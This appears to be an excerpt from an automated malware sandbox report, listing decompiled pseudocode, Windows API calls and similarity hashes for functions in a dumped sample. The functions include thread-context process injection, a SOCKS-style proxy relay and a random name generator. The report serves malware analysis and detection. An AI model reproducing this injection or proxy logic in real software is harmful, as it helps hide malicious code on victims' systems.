Instruction Fuzzy Hash: 1F21DC71901218BBCF20ABA18D45FEF7BBCAB45750F0440BBB500F21A0DA369F4ACA64

Uniqueness

Uniqueness Score: -1.00%

Function 004105EA, Relevance: 7.6, APIs: 5, Instructions: 83
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004105EA(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
				struct _CONTEXT _v720;
				void* __edi;
				void* __esi;
				intOrPtr _t32;
				void* _t36;
				void* _t37;
				void** _t45;
				void* _t46;
				void* _t47;
				void** _t50;
				void* _t52;
				void* _t53;
				signed int _t55;

				_t47 = __edx;
				_t45 = _a4;
				_t32 =  *0x423b84(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
				_a40 = _t32;
				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E0041CB59() != 0 && GetProcessId( *_t45) != 0) {
					_t36 = E0041C98A(_t46, _t47, _t35);
					_a44 = _t36;
					_t63 = _t36;
					if(_t36 != 0) {
						_push(_t52);
						_t37 = E0041CA6E(_t46,  *_t45, _t52, _t63, _t36, 0);
						_t50 = _a8;
						_t53 = _t37;
						_a32 = _t53;
						_t55 = _t53 -  *0x423b74 + E0041D1E0;
						_v720.ContextFlags = 0x10003;
						if(GetThreadContext( *_t50,  &_v720) == 0 || _v720.Eip !=  *0x423b8c) {
							L12:
							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
						} else {
							if(( *0x423b60 & 0x00000010) != 0) {
								_t55 = _t55 ^ _v720.Eax;
							}
							_v720.Eax = _t55;
							_v720.ContextFlags = 0x10002;
							if(SetThreadContext( *_t50,  &_v720) == 0) {
								goto L12;
							}
						}
						CloseHandle(_a44);
					}
				}
				return _a40;
			}

0x004105ea
0x004105f7
0x00410616
0x0041061c
0x00410621
0x00410661
0x00410666
0x00410669
0x0041066b
0x00410671
0x00410678
0x0041067d
0x00410680
0x00410688
0x00410694
0x0041069a
0x004106ac
0x004106ee
0x004106fa
0x004106bc
0x004106c3
0x004106c5
0x004106c5
0x004106d4
0x004106da
0x004106ec
0x00000000
0x00000000
0x004106ec
0x00410703
0x0041070a
0x0041066b
0x00410710

APIs

Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61

GetProcessId.KERNEL32(?), ref: 00410652

Part of subcall function 0041C98A: CreateMutexW.KERNEL32(00423B98,00000001,?,00423DD8,0001FDA6,?,00000002,?,0001FDA6), ref: 0041C9D2
Part of subcall function 0041C98A: GetLastError.KERNEL32 ref: 0041C9DE
Part of subcall function 0041C98A: CloseHandle.KERNEL32(00000000), ref: 0041C9EC

GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004106A4
SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 004106E4
VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 004106FA
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00410703

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseContextHandleThread$CreateErrorFreeLastMutexObjectProcessSingleVirtualWait
String ID:
API String ID: 3998962940-0
Opcode ID: c8bfe3b45fa409a80420dbf189d15c0c4fbe2b2fe79c2d41dfebf69492de5cb9
Instruction ID: 92eae0c657f4527d92254eb329bae3aa5fdd8216ce0b74c91d170cb7f81f2065
Opcode Fuzzy Hash: c8bfe3b45fa409a80420dbf189d15c0c4fbe2b2fe79c2d41dfebf69492de5cb9
Instruction Fuzzy Hash: 48314731500219ABDF228FA5CD48FDE7BB9BF08304F004166F908A62A0C7B9E9D0DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040702D, Relevance: 7.6, APIs: 5, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040702D(struct HWND__* __ecx, intOrPtr* __edx) {
				struct tagRECT _v24;
				char _v28;
				struct HWND__* _v32;
				intOrPtr _v36;
				struct HWND__* _v40;
				void* __edi;
				intOrPtr _t29;
				signed int _t30;
				RECT* _t52;
				signed int _t54;
				intOrPtr* _t61;

				_t55 = __edx;
				_t61 = __edx;
				 *( *(__edx + 0x14)) = 0x3c;
				_v32 = __ecx;
				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
					L12:
					return 1;
				}
				_t29 =  *((intOrPtr*)(_t61 + 0x14));
				_t54 =  *(_t29 + 0x24);
				if((_t54 & 0x40000000) == 0) {
					_t52 =  *_t61 + 0x24;
				} else {
					_t52 = _t61 + 4;
				}
				if((_t54 & 0x10000000) == 0) {
					_t30 = 0;
					goto L9;
				} else {
					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
						L10:
						E00406EBC( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
						_v36 =  *_t61;
						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
						if(GetTopWindow(_v40) != 0) {
							E0041640F( &_v28, _t35);
						}
						goto L12;
					}
					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
						goto L12;
					}
					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
					L9:
					if(_t30 == 0) {
						goto L12;
					}
					goto L10;
				}
			}

0x0040702d
0x00407038
0x0040703e
0x00407047
0x00407054
0x004070f8
0x00407100
0x00407100
0x0040705a
0x0040705d
0x00407066
0x0040706f
0x00407068
0x00407068
0x00407068
0x00407078
0x004070bc
0x00000000
0x0040707a
0x00407093
0x004070c2
0x004070cd
0x004070d8
0x004070df
0x004070eb
0x004070f3
0x004070f3
0x00000000
0x004070eb
0x004070a4
0x00000000
0x00000000
0x004070b7
0x004070be
0x004070c0
0x00000000
0x00000000
0x00000000
0x004070c0

APIs

GetWindowInfo.USER32 ref: 0040704C
IntersectRect.USER32 ref: 0040708A
IsRectEmpty.USER32 ref: 0040709C
IntersectRect.USER32 ref: 004070B3
GetTopWindow.USER32(?), ref: 004070E3

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectWindow$EmptyInfo
String ID:
API String ID: 1664082778-0
Opcode ID: 1a51ed025b18ed400249223745f826c59d289748f49b9af6de5b0c37ad00f426
Instruction ID: c50a79028752804c12e36a1740f9f6e937e3b3039b1681199d95bf64d1dbe1b7
Opcode Fuzzy Hash: 1a51ed025b18ed400249223745f826c59d289748f49b9af6de5b0c37ad00f426
Instruction Fuzzy Hash: 7121AC716083019BD720DF28DD84E97B3ECAF44700B044A2EB892E3791DB39F9099B76

Uniqueness

Uniqueness Score: -1.00%

Function 00419AAB, Relevance: 7.6, APIs: 5, Instructions: 72
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00419AAB(void* __ecx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v104;
				char _v204;
				char _v724;
				void* __edi;
				intOrPtr _t18;
				void* _t26;
				void* _t40;
				WCHAR* _t43;

				_t40 = __ecx;
				SetThreadPriority(GetCurrentThread(), 0);
				_t18 = E0041CA33(_t40, 0x19367402, 1);
				_v12 = _t18;
				if(_t18 != 0) {
					E0041C9FB(0xff220829,  &_v204, 0);
					_t43 =  &_v724;
					E0041CD51(_t40, _t43, __esi, 1);
					PathQuoteSpacesW(_t43);
					_t41 = _t43;
					_v8 = E0041284D(_t43);
					if(E0041CB59() == 0) {
						L7:
						E004154D1(_v12);
						return 0;
					}
					_push(__esi);
					_t26 = 3;
					E00419897(_t26,  &_v104);
					if(WaitForSingleObject( *0x424024, 0xc8) != 0x102) {
						L6:
						goto L7;
					}
					_v8 = _v8 + _v8 + 2;
					do {
						E00415F81(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
					} while (WaitForSingleObject( *0x424024, 0xc8) == 0x102);
					goto L6;
				}
				return _t18 + 1;
			}

0x00419aab
0x00419abd
0x00419aca
0x00419acf
0x00419ad4
0x00419aeb
0x00419af2
0x00419af8
0x00419b00
0x00419b06
0x00419b0d
0x00419b17
0x00419b76
0x00419b79
0x00000000
0x00419b80
0x00419b1a
0x00419b20
0x00419b21
0x00419b3f
0x00419b74
0x00000000
0x00419b75
0x00419b48
0x00419b4b
0x00419b62
0x00419b70
0x00000000
0x00419b4b
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 00419AB6
SetThreadPriority.KERNEL32(00000000), ref: 00419ABD

Part of subcall function 0041CA33: CreateMutexW.KERNEL32(00423B98,00000000,?,?,?,?,?), ref: 0041CA54

PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 00419B00
WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 00419B38
WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 00419B6E

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
String ID:
API String ID: 123286213-0
Opcode ID: 926aa25df16a5d179b1a8ccc8b94a718ce8b155d34b04c9fad9977fc0bcb2ccc
Instruction ID: 941b93ef7c4bc703d0734377c072a84272e080a075ddd60badc328fceffd07cc
Opcode Fuzzy Hash: 926aa25df16a5d179b1a8ccc8b94a718ce8b155d34b04c9fad9977fc0bcb2ccc
Instruction Fuzzy Hash: 3D21A171E00208AFDF11EBA1DD85FEE7BB9EB44344F10006AF501F71A0DA789E818B58

Uniqueness

Uniqueness Score: -1.00%

Function 00415223, Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON

Download Yara Rule

APIs

#23.WS2_32(?,00000002,00000000,00000000,00000000,00000002,?,?,00000000), ref: 00415235
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0041525F
#111.WS2_32 ref: 00415266
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00415292

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

#3.WS2_32(?), ref: 004152A6

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Ioctl$#111FreeHeap
String ID:
API String ID: 1077273850-0
Opcode ID: 5db9e945f662ff890b58769470e340489ec91b50404a67f8d039d0e6dfc431c9
Instruction ID: 680ddaf24449e80ffade0b0a93b0082cc5e0a9b085d1d9dc2ec49e7e66ba68b9
Opcode Fuzzy Hash: 5db9e945f662ff890b58769470e340489ec91b50404a67f8d039d0e6dfc431c9
Instruction Fuzzy Hash: 031191B2801128FFDB109BA5DD49CDF7F2CEF953A4B100155F509E6160D2748F81DAE4

Uniqueness

Uniqueness Score: -1.00%

Function 00406C33, Relevance: 7.6, APIs: 5, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406C33(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
				int _t20;
				signed int _t21;
				struct HWND__* _t28;
				char* _t32;

				_t28 = _a4;
				if(( *0x423b60 & 0x00000004) == 0 || E0041CB59() == 0) {
					L9:
					return GetUpdateRect(_t28, _a8, _a12);
				} else {
					_t32 = TlsGetValue( *0x42291c);
					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
						goto L9;
					} else {
						if(_a8 != 0) {
							_t6 = _t32 + 0xc; // 0xc
							E00411D3A( &_a8, _t6, 0x10);
						}
						if(_a12 != 0) {
							_t20 = SaveDC( *(_t32 + 8));
							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
							RestoreDC( *(_t32 + 8), _t20);
						}
						 *_t32 = 1;
						return 1;
					}
				}
			}

0x00406c3e
0x00406c42
0x00406cb3
0x00000000
0x00406c4d
0x00406c59
0x00406c5d
0x00000000
0x00406c64
0x00406c68
0x00406c6c
0x00406c74
0x00406c74
0x00406c7d
0x00406c83
0x00406c93
0x00406c9b
0x00406ca2
0x00406ca5
0x00406cab
0x00406caf
0x00000000
0x00406caf
0x00406c5d

APIs

GetUpdateRect.USER32(?,?,?), ref: 00406CBA

Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61

TlsGetValue.KERNEL32 ref: 00406C53
SaveDC.GDI32(?), ref: 00406C83
SendMessageW.USER32(?,00000014,?,00000000), ref: 00406C93
RestoreDC.GDI32(?,00000000), ref: 00406CA5

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: b976798dc2aa6e191c371ef28a488bd6232ce2aa9279aea17404f7bdb35836e0
Instruction ID: b46e36ecbfa026970fb6d20800ac71d22960878f0fc247fac30e8f39ca08555f
Opcode Fuzzy Hash: b976798dc2aa6e191c371ef28a488bd6232ce2aa9279aea17404f7bdb35836e0
Instruction Fuzzy Hash: C611C231104745EFDB219F62DE48F9B7BA8EB04314F00843AF986E21B1C739A451CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00406E28, Relevance: 7.5, APIs: 5, Instructions: 48
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406E28() {
				struct tagMSG _v32;
				signed int _t12;
				intOrPtr _t15;
				char _t17;
				intOrPtr _t19;
				void* _t21;

				SetThreadPriority(GetCurrentThread(), 1);
				SetEvent( *0x422924);
				while(1) {
					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
					if(_t12 == 0xffffffff) {
						break;
					}
					__eflags = _t12;
					if(_t12 == 0) {
						break;
					} else {
						__eflags = _v32.message -  *0x422920; // 0x0
						if(__eflags == 0) {
							__eflags = _v32.wParam - 0xfffffffc;
							if(_v32.wParam == 0xfffffffc) {
								_t15 =  *0x422928; // 0x0
								__eflags = _t15 + 0x114;
								_t17 = E004066DB(_t15 + 0x114, _t19, _t21, 0x422918, _v32.lParam, 1);
								_t19 =  *0x422928; // 0x0
								 *((char*)(_t19 + 0x124)) = _t17;
								SetEvent( *0x422924);
							}
						}
						continue;
					}
				}
				return _t12 & 0xffffff00 | _t12 == 0x00000000;
			}

0x00406e3c
0x00406e4e
0x00406e9d
0x00406ea8
0x00406ead
0x00000000
0x00000000
0x00406e58
0x00406e5a
0x00000000
0x00406e5c
0x00406e60
0x00406e66
0x00406e68
0x00406e6d
0x00406e6f
0x00406e7a
0x00406e84
0x00406e89
0x00406e8f
0x00406e9b
0x00406e9b
0x00406e6d
0x00000000
0x00406e66
0x00406e5a
0x00406ebb

APIs

GetCurrentThread.KERNEL32 ref: 00406E35
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041D5D0), ref: 00406E3C
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,0041D5D0), ref: 00406E4E
SetEvent.KERNEL32(00422918,?,00000001), ref: 00406E9B
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00406EA8

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: EventThread$CurrentMessagePriority
String ID:
API String ID: 3943651903-0
Opcode ID: 0e7b19ea20b954f56b54a8af1980c8ad46da0c50edac45e430c5c637ca33c364
Instruction ID: 9b2ea45552039518e560ddc03244cae4d46747c4fdcee4069202594f267e01db
Opcode Fuzzy Hash: 0e7b19ea20b954f56b54a8af1980c8ad46da0c50edac45e430c5c637ca33c364
Instruction Fuzzy Hash: 4101D6313003106BCB20AF64EE45B9637A4AF84730F51073AF521B61F0CB74A4518B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00419C1A, Relevance: 7.5, APIs: 5, Instructions: 32synchronizationwindowCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,000207F8,0041A053,00000000), ref: 00419C20
ReleaseMutex.KERNEL32(?), ref: 00419C54
IsWindow.USER32(?), ref: 00419C5B
PostMessageW.USER32(?,00000215,00000000,?), ref: 00419C75
SendMessageW.USER32(?,00000215,00000000,?), ref: 00419C7D

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
String ID:
API String ID: 794275546-0
Opcode ID: 35c340f7b741d5c84b8ce1e28aeaa712a18d8af1794ea080629abf2c432c982f
Instruction ID: 5e5cd4f1bc1b935a0ec51661bb5232b9974ab2aa9beaefa4869282207e98cc10
Opcode Fuzzy Hash: 35c340f7b741d5c84b8ce1e28aeaa712a18d8af1794ea080629abf2c432c982f
Instruction Fuzzy Hash: 0AF019742047009FD3209F24E9489A6BBF4FB89711B044A7DF8D6937B1D770A884CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00419C1A, Relevance: 7.5, APIs: 5, Instructions: 32synchronizationwindowCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,745FA660,0041A053,00000000), ref: 00419C20
ReleaseMutex.KERNEL32(?), ref: 00419C54
IsWindow.USER32(?), ref: 00419C5B
PostMessageW.USER32(?,00000215,00000000,?), ref: 00419C75
SendMessageW.USER32(?,00000215,00000000,?), ref: 00419C7D

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
String ID:
API String ID: 794275546-0
Opcode ID: 35c340f7b741d5c84b8ce1e28aeaa712a18d8af1794ea080629abf2c432c982f
Instruction ID: 5e5cd4f1bc1b935a0ec51661bb5232b9974ab2aa9beaefa4869282207e98cc10
Opcode Fuzzy Hash: 35c340f7b741d5c84b8ce1e28aeaa712a18d8af1794ea080629abf2c432c982f
Instruction Fuzzy Hash: 0AF019742047009FD3209F24E9489A6BBF4FB89711B044A7DF8D6937B1D770A884CB25

Uniqueness

Uniqueness Score: -1.00%

Function 0040614C, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040614C(void* __eflags, signed int _a4) {
				char _v9;
				char _v13;
				char _v20;
				signed int _v24;
				signed int _v29;
				short _v31;
				signed char _v32;
				intOrPtr _v36;
				signed int _v48;
				short _v50;
				char _v52;
				char _v312;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t59;
				void* _t61;
				short _t77;
				void* _t79;
				void* _t84;
				char _t103;
				char* _t105;
				signed int _t115;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				char _t129;
				void* _t131;
				intOrPtr _t132;
				void* _t133;

				_t110 = _a4;
				_t59 = E004152B6(_t110);
				_push(0);
				_push( &_v32);
				_t61 = 7;
				_v24 = 0 | _t59 == 0x00000017;
				if(E00414CB1(_t61, _t110) != 0) {
					while(E00414CB1(1, _t110,  &_v9, 0) != 0) {
						if(_v9 == 0) {
							_t115 = _v29;
							_t116 = _t115 << 0x10;
							_v13 = 0x5a;
							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L20:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L44:
									_t55 =  &_v24; // 0x405120
									return E004060D6(_t110, 0xffffffff, _v13,  *_t55) & 0xffffff00 | _t73 != 0x00000000;
								}
								E00411DB1( &_v52,  &_v52, 0, 0x10);
								_t77 = 2;
								_v52 = _t77;
								_t79 = (_v32 & 0x000000ff) - 1;
								if(_t79 == 0) {
									_v50 = _v31;
									_v48 = _v29;
									_t127 = E00414D46( &_v52);
									if(_t127 == 0xffffffff) {
										L23:
										_v13 = 0x5b;
										goto L44;
									}
									E004150F9(_t116, _t127);
									_t50 =  &_v24; // 0x405120
									_t84 = E004060D6(_t110, _t127, 0x5a,  *_t50);
									if(_t84 != 1) {
										if(_t84 != 0xffffffff) {
											_v9 = 0;
										} else {
											_v13 = 0x5b;
										}
									} else {
										_push(_t127);
										_t84 = E00414EFA(_t110);
									}
									E004150A1(_t84, _t127);
									if(_v9 != 1 || _v13 == 0x5a) {
										L34:
										return _v9;
									} else {
										goto L44;
									}
								}
								if(_t79 == 1) {
									_t129 = E00414E40( &_v52, 1);
									_v20 = _t129;
									if(_t129 == 0xffffffff) {
										goto L23;
									}
									_t32 =  &_v24; // 0x405120
									_t125 = E004060D6(_t110, _t129, 0x5a,  *_t32);
									if(_t125 != 1) {
										L31:
										E004150A1(_t89, _t129);
										if(_t125 == 0xffffffff) {
											goto L23;
										}
										if(_t125 != 1) {
											_v9 = 0;
										}
										goto L34;
									}
									_t126 = E00415071( &_v20,  &_a4);
									_v36 = _t126;
									E004150A1(_t93, _v20);
									if(_t126 != 0xffffffff) {
										E004150F9(_t116, _t126);
										_t110 = _a4;
										_t125 = E004060D6(_a4, _t126, 0x5a, _v24 | 0x00000002);
										if(_t125 == 1) {
											_push(_v36);
											_t89 = E00414EFA(_t110);
										}
										_t129 = _v36;
										goto L31;
									}
									_t110 = _a4;
									_v13 = 0x5b;
									goto L44;
								}
								goto L23;
							}
							_t131 = 0;
							while(1) {
								_t116 = _t110;
								if(E00414CB1(1, _t110,  &_v9, 0) == 0) {
									goto L1;
								}
								_t103 = _v9;
								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
								if(_t103 == 0) {
									_t105 =  &_v312;
									_v20 = 0;
									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
									if(_t105 == 0) {
										_t132 = _v20;
										while(_t132 != 0) {
											if( *((intOrPtr*)(_t132 + 4)) == 2) {
												E00411D3A( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
												L19:
												__imp__freeaddrinfo(_v20);
												if(_t132 == 0) {
													goto L12;
												}
												goto L20;
											}
											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
										}
										goto L19;
									}
									L12:
									_v13 = 0x5b;
									goto L20;
								}
								_t131 = _t131 + 1;
								if(_t131 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}

0x00406156
0x0040615c
0x0040616c
0x00406170
0x00406173
0x00406174
0x00406180
0x0040618f
0x0040618d
0x004061a4
0x004061bd
0x004061cb
0x004061d4
0x0040625e
0x00406262
0x00406266
0x00406394
0x00406394
0x00000000
0x004063a4
0x00406273
0x0040627a
0x0040627b
0x00406283
0x00406284
0x00406338
0x00406342
0x0040634a
0x0040634f
0x0040628d
0x0040628d
0x00000000
0x0040628d
0x00406356
0x0040635b
0x00406362
0x0040636a
0x00406377
0x0040637f
0x00406379
0x00406379
0x00406379
0x0040636c
0x0040636c
0x0040636d
0x0040636d
0x00406383
0x0040638c
0x0040632a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040638c
0x0040628b
0x004062a0
0x004062a2
0x004062a8
0x00000000
0x00000000
0x004062aa
0x004062b6
0x004062bb
0x00406313
0x00406313
0x0040631b
0x00000000
0x00000000
0x00406324
0x00406326
0x00406326
0x00000000
0x00406324
0x004062cd
0x004062cf
0x004062d2
0x004062da
0x004062e9
0x004062f1
0x00406301
0x00406306
0x00406308
0x0040630b
0x0040630b
0x00406310
0x00000000
0x00406310
0x004062dc
0x004062df
0x00000000
0x004062df
0x00000000
0x0040628b
0x004061da
0x004061dc
0x004061e4
0x004061ed
0x00000000
0x00000000
0x004061ef
0x004061f2
0x004061fb
0x00406211
0x00406218
0x0040621b
0x00406223
0x0040622b
0x00406239
0x00406234
0x0040624c
0x00406251
0x00406254
0x0040625c
0x00000000
0x00000000
0x00000000
0x0040625c
0x00406236
0x00406236
0x00000000
0x0040623d
0x00406225
0x00406225
0x00000000
0x00406225
0x004061fd
0x00406204
0x00000000
0x00000000
0x00000000
0x00406206
0x00000000
0x004061dc
0x0040618d
0x0040618f
0x00406182
0x00000000

APIs

Part of subcall function 004152B6: #6.WS2_32(?,?,?), ref: 004152D4

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0040621B
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00406254

Part of subcall function 004150F9: #21.WS2_32(?,00000006,00000001,?,00000004,?,?,0040530A,00000000), ref: 0041510F

Part of subcall function 004060D6: #5.WS2_32(000000FF,00000000,00000000,?,00000000,?), ref: 004060FA

Part of subcall function 00414EFA: #18.WS2_32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00414F9A

Strings

[, xrefs: 0040628D
Q@, xrefs: 00406394, 0040635B, 004062AA

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: freeaddrinfogetaddrinfo
String ID: Q@$[
API String ID: 1109861670-161043652
Opcode ID: 0110c680047cf071fac25ba66387492684a481b15a11aad9589653b4ad7bcdcf
Instruction ID: ee0252876a6dc4b4f2e3b2f326d1f8f38a0852e5eafea310ca28aaecfb6daa1d
Opcode Fuzzy Hash: 0110c680047cf071fac25ba66387492684a481b15a11aad9589653b4ad7bcdcf
Instruction Fuzzy Hash: 6A614B31D00114ABDF20ABA88C01AEFBBB5AF45354F02467BEC57B72C2D67C895187A9

Uniqueness

Uniqueness Score: -1.00%

Function 00416081, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416081(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t56;
				WCHAR* _t57;
				short* _t59;
				signed short _t71;
				char* _t77;
				signed int _t84;
				signed short* _t85;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;

				_t87 = E00413083(__eax & 0x000000ff, __ecx & 0x000000ff);
				_v16 = _t87;
				_t56 = E00413037();
				_t77 = "bcdfghklmnpqrstvwxz";
				if((_t56 & 0x00000100) == 0) {
					_v32 = "aeiouy";
					_v28 = _t77;
				} else {
					_v32 = _t77;
					_v28 = "aeiouy";
				}
				_t84 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_t87 > 0) {
					_v20 = _a4 & 0x00000004;
					do {
						if(_v8 == 2) {
							if((E00413037() & 0x00000100) == 0) {
								_v32 = "aeiouy";
								_v28 = _t77;
							} else {
								_v32 = _t77;
								_v28 = "aeiouy";
							}
							_v8 = _v8 & 0x00000000;
						}
						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;
						if(_v20 == 0 || _t84 - _v12 <= 1 || (E00413037() & 0x00000101) != 0x101) {
							_t71 =  *((char*)(E00413083(_v24 - 1, 0) + _t88));
						} else {
							_t71 = 0x20;
							_v12 = _t84;
						}
						_a8[_t84] = _t71;
						_t84 = _t84 + 1;
						_v8 = _v8 + 1;
					} while (_t84 < _v16);
					_t87 = _v16;
				}
				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
					_t85 = _a8;
				} else {
					_t85 = _a8;
					_t59 = _t85 + _t87 * 2 - 2;
					while( *_t59 == 0x20) {
						_t59 = _t59 - 2;
						_t87 = _t87 - 1;
						if(_t87 != 0) {
							continue;
						} else {
						}
						goto L24;
					}
				}
				L24:
				_t57 = 0;
				_t85[_t87] = 0;
				if((_a4 & 0x00000002) != 0) {
					_t57 = CharUpperW( *_t85 & 0x0000ffff);
					 *_t85 = 0;
				}
				return _t57;
			}

0x00416096
0x00416098
0x0041609b
0x004160a0
0x004160aa
0x004160b8
0x004160bf
0x004160ac
0x004160ac
0x004160af
0x004160af
0x004160c2
0x004160c4
0x004160c7
0x004160cc
0x004160d8
0x004160db
0x004160df
0x004160eb
0x004160f9
0x00416100
0x004160ed
0x004160ed
0x004160f0
0x004160f0
0x00416103
0x00416103
0x0041610a
0x00416120
0x00416123
0x00416154
0x00416141
0x00416143
0x00416144
0x00416144
0x0041615c
0x00416160
0x00416161
0x00416164
0x0041616d
0x0041616d
0x00416174
0x0041618f
0x0041617a
0x0041617a
0x0041617d
0x00416181
0x00416187
0x0041618a
0x0041618b
0x00000000
0x00000000
0x0041618d
0x00000000
0x0041618b
0x00416181
0x00416192
0x00416192
0x00416198
0x0041619c
